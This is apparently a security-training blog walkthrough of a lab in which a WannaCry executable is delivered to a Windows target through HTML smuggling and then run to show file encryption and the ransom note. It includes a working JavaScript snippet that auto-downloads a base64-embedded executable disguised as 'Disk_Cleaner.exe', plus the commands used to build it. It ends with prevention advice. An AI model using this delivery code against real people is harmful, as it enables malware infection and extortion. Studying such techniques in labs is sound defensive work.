    23 August 22

    Lab Walkthrough - The WannaCry Ransomware

    Posted by Ashish Bhangale

    In our lab walkthrough series, we go through selected lab exercises on our INE Platform. Subscribe or sign up for a 7-day, risk-free trial with INE and access this lab and a robust library covering the latest in Cyber Security, Networking, Cloud, and Data Science!

    Introduction

    In May 2017, a worldwide ransomware attack, infamously known as WannaCry, was set in motion. It targeted the Microsoft Windows operating system, encrypting the data on the victim's machine and demanding a ransom in exchange for a promise to decrypt the files and undo the damage. That promise is far from guaranteed, as we discuss further below. To reach other Windows machines, the ransomware used EternalBlue, an exploit against Microsoft's SMBv1 implementation that The Shadow Brokers group leaked in April 2017, and it planted the DoublePulsar kernel backdoor on each compromised host to load its payload and spread onward from the infected machine.

    Cybersecurity Ventures estimated that ransomware damages cost the world $5 billion (USD) in 2017, and predicted $8 billion for 2018, $11.5 billion for 2019 and $20 billion for 2021.


    Reference: https://cybersecurityventures.com/global-ransomware-damage-costs-predicted-to-reach-250-billion-usd-by-2031/

    Similar attacks are still active. Since 2017, many ransomware families have appeared under different names. Even after paying the ransom, there is no guarantee that your data will be decrypted.

    Who is a target for ransomware?

    According to Josh Fruhlinger's article Ransomware Explained, "there are several different ways attackers choose the organizations they target with ransomware. Sometimes it’s a matter of opportunity: for instance, attackers might target universities because they tend to have smaller security teams and a disparate user base that does a lot of file sharing, making it easier to penetrate their defenses.

    On the other hand, some organizations are tempting targets because they seem more likely to pay a ransom quickly. For instance, government agencies or medical facilities often need immediate access to their files. Law firms and other organizations with sensitive data may be willing to pay to keep news of a compromise quiet — and these organizations may be uniquely sensitive to leakware attacks."


    Lab Environment

    In our lab, we will learn how an attacker can use HTML smuggling to deliver the WannaCry executable to a target user, and how running that executable encrypts the data on the target user's machine, holding the user to ransom to get the data back.

    Lab Link: https://my.ine.com/CyberSecurity/courses/ebd09929/cyber-security-vulnerabilities-training-library/lab/4b63157f-62c0-4deb-a3bd-617077cfcae2


    The user gets access to a Kali GUI instance and a Windows Server 2019 machine. The Kali machine plays the part of the attacker, and the Windows machine is the target user's machine.

    Objective: Deliver the WannaCry executable to the Windows machine using HTML smuggling and execute it to observe the working of WannaCry ransomware!

    Tools

    The best tools for this lab are:

    • Chrome Browser
    • Apache Web Server

    The WannaCry executable is located in the /root/Desktop/tools/ folder, packed as wannacry.zip.

    Solution

    Step 1: Open the lab link to access the Kali GUI instance and target machine

    Kali GUI


    Target Machine


    Notice that a shortcut to the Chrome browser and an "Important Files" folder are present on the Desktop.

    Step 2: A ready-made HTML template is available in the /root/Desktop/tools/html-templates folder. We will copy these files to the Apache web server's root folder (/var/www/html/).

    HTML template source: https://templatemo.com/tm-519-beauty

    Note: Remove all existing files from the Apache web server's root folder before copying the template files, so the stock Apache index page cannot shadow the template's index.html.

    Commands:

    rm -rf /var/www/html/*
    ls /var/www/html/

    Step 3: The WannaCry ransomware executable is in the /root/Desktop/tools/ folder, packed as wannacry.zip. We need to unzip the archive to access the executable, then confirm with the file utility what kind of file it is.

    Commands:

    cd /root/Desktop/tools
    unzip wannacry.zip
    file wanncry.exe

    The WannaCry attack of May 2017 was one of the most notorious worldwide cyberattacks. It targets the Windows operating system, encrypting data and demanding ransom payments in cryptocurrency (Bitcoin).

    For more information: https://en.wikipedia.org/wiki/WannaCry_ransomware_attack

    We are going to use an HTML template and modify the `index.html` file to deliver the ransomware.

    Step 4: Copy the HTML template files to the web server's root folder.

    Commands:

    cp -rf /root/Desktop/tools/html-templates/* /var/www/html/
    ls /var/www/html/

    Modify the index.html file and paste the code below inside the HTML <body> tag (just before the closing </body> tag is a good spot, so the page still renders normally while the download fires).

    <script>
    // Decode the base64 string back into raw bytes inside the browser.
    function base64ToArrayBuffer(base64) {
        var binary_string = window.atob(base64);
        var len = binary_string.length;
        var bytes = new Uint8Array(len);
        for (var i = 0; i < len; i++) {
            bytes[i] = binary_string.charCodeAt(i);
        }
        return bytes.buffer;
    }
    // The executable travels inside the page as a base64 string literal.
    var file = '<backdoor.exe Base64 Encoded Value>';
    var data = base64ToArrayBuffer(file);
    // Standard MIME type for arbitrary bytes (the original snippet used the non-standard 'octet/stream').
    var blob = new Blob([data], {type: 'application/octet-stream'});
    var fileName = 'Disk_Cleaner.exe';
    // Create a hidden link to a blob: URL and click it, so the browser saves the file to Downloads.
    var a = document.createElement('a');
    document.body.appendChild(a);
    a.style = 'display: none';
    var url = window.URL.createObjectURL(blob);
    a.href = url;
    a.download = fileName;
    a.click();
    window.URL.revokeObjectURL(url);
    </script>

    HTML smuggling is a phishing delivery technique that uses HTML5 and JavaScript features to carry a malicious executable inside an otherwise ordinary web page or HTML attachment, as an encoded string rather than as a file. When the target opens the HTML in a browser, the JavaScript decodes the string and hands the result to the browser as a download, so the executable is assembled on the endpoint and never crosses the network as an identifiable binary. According to Microsoft:

    A highly evasive malware delivery technique that leverages legitimate HTML5 and JavaScript features, is increasingly used in email campaigns that deploy banking malware, remote access Trojans (RATs), and other payloads related to targeted attacks. Notably, this technique was observed in a spear-phishing campaign from the threat actor NOBELIUM in May. More recently, we have also seen this technique deliver the banking Trojan Mekotio, as well as AsyncRAT/NJRAT and Trickbot, malware that attackers utilize to gain control of affected devices and deliver ransomware payloads and other threats.

    Step 5: The web server content is in place. Now copy the base64-encoded WannaCry executable (wanncry.exe) to the clipboard using the xsel utility. The -w0 flag disables line wrapping, so the output is a single line that fits inside a JavaScript string literal.

    Command:

    base64 -w0 /root/Desktop/tools/wanncry.exe | xsel --clipboard

    Step 6: Paste the base64 value into index.html, replacing the placeholder `<backdoor.exe Base64 Encoded Value>` in `var file` (keep the surrounding single quotes).

    Note: The base64 string is several megabytes long, so the editor may take 1-2 minutes to paste it. Please wait patiently.

    We have now completed all the requirements to create an HTML smuggling web server that distributes the executable.

    Step 7: Start the Apache web server, then confirm it is serving the template by browsing to http://127.0.0.1/ from Kali before moving on.

    Command:

    /etc/init.d/apache2 start

    Step 8: We need the attacker machine's IP address so the Windows host can reach the malicious web server. Check it with:

    Command:

    ip addr

    The IP Address of the attacker (Kali Machine) is 10.10.15.2

    Step 9: Now switch the view to the target machine.

    We notice an "Important Files" folder on the Desktop containing two files, INE.jpg and office.pdf.

    Step 10: Open both files to confirm they are intact:

    Opening INE.jpg

    Opening office.pdf

    We can open both files without any issue.

    Step 11: Open the web browser on the Windows machine and browse to the site hosted by the attacker.

    URL: http://10.10.15.2/

    Notice that Disk_Cleaner.exe was downloaded automatically, without any action on the user's part beyond visiting the page. This confirms that the HTML smuggling JavaScript worked and delivered the wanncry.exe executable to the target machine. Nothing on the wire looked like an executable download: the web server only ever served HTML, and the binary was assembled by the browser on the endpoint.

    Chrome flagged the download as potentially dangerous. This happens because the file is an unsigned executable from a site Chrome's download protection knows nothing about, not because Chrome recognised it as WannaCry; any freshly built, unsigned .exe served from an unfamiliar host gets the same treatment.

    Attackers try to get around signature-based checks with tools such as SigThief, which copies the Authenticode signature from a legitimately signed binary onto another file. The resulting signature does not validate, so it only fools products that check for the presence of a signature rather than its validity. The SpecterOps paper below covers this and other ways trust in Windows code signing is subverted.

    Reference: https://specterops.io/assets/resources/SpecterOps_Subverting_Trust_in_Windows.pdf

    Step 12: Execute the Disk_Cleaner.exe executable.

    The file was saved to the C:\Users\Administrator\Downloads\ folder.

    Again we get a Windows "Open File - Security Warning" dialog. Windows shows it because the browser tagged the download with the Mark of the Web (the Zone.Identifier alternate data stream that marks a file as coming from the Internet zone) and the executable has no valid publisher signature.

    We click Run:

    Once we click Run, wanncry.exe starts encrypting files on the system and appends .WNCRY to the name of each encrypted file.

    Here is the full list of file extensions that were searched on the windows machine and encrypted by the WannaCry ransomware: https://gist.github.com/xpn/facb5692980c14df272b16a4ee6a29d5

    As soon as WannaCry has encrypted the files, it shows a ransom message demanding payment in cryptocurrency (Bitcoin).

    A countdown is shown as well. The note warns that if the ransom is not paid in time the decryption key will be deleted and the data will stay encrypted. As noted in the introduction, paying offers no guarantee either.

    The note also shows a Bitcoin address. Looking up that address on Blockchair (https://blockchair.com/bitcoin/address/13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94) shows that, at the time of writing, people were still sending payments to it.

    Bitcoin address: 13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94

    Try to check the files present in the Important Files folder, i.e, INE.jpg, and office.pdf. You won’t be able to open them this time as they are encrypted by ransomware.


    How can we prevent such attacks?

    Keep the Windows operating system fully updated and never download or execute unknown or untrusted executables. Some further actions that help against this type of attack:

    • Take regular, offline backups of all your data, and test that they restore
    • Install antivirus software and firewalls
    • Keep all systems and software updated; for WannaCry specifically, the MS17-010 patch and disabling SMBv1 stop the EternalBlue propagation
    • Because the executable is assembled inside the browser, gateway filters that only look for executable attachments will not see it; treat HTML attachments and unexpected downloads with suspicion, keep Mark of the Web and SmartScreen enabled, and use application control to block unsigned executables from running out of the Downloads folder

    References

    1. https://en.wikipedia.org/wiki/WannaCry_ransomware_attack

    2. https://outflank.nl/blog/2018/08/14/html-smuggling-explained

    3. https://www.upguard.com/blog/best-practices-to-prevent-ransomware-attacks

    Try HTML Smuggling and executing the Wannacry Ransomware in this lab to understand it! Subscribe or sign up for a 7-day, risk-free trial with INE to access this lab and a robust library covering the latest in Cyber Security, Networking, Cloud, and Data Science!

    © 2024 INE. All Rights Reserved. All logos, trademarks and registered trademarks are the property of their respective owners.